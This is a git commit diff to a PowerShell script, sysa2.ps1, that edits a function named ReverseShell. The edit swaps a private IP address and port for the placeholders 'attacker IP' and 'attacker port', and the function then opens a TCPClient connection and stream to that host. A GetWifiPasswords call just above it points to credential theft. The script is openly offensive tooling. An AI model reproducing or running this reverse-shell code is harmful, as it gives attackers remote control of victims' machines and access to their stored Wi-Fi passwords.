Update sysa2.ps1

pull/466/head
Nicolo’ 2024-07-24 14:21:40 +02:00 committed by GitHub
parent 8833b95983
commit b3f8d984b1
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 2 additions and 2 deletions

View File

@ -101,8 +101,8 @@ GetWifiPasswords
# Reverse shell
function ReverseShell {
$ip = '192.168.31.82'
$port = '8080'
$ip = 'attacker IP'
$port = 'attacker port'
$client = New-Object System.Net.Sockets.TCPClient($ip, $port)
$stream = $client.GetStream()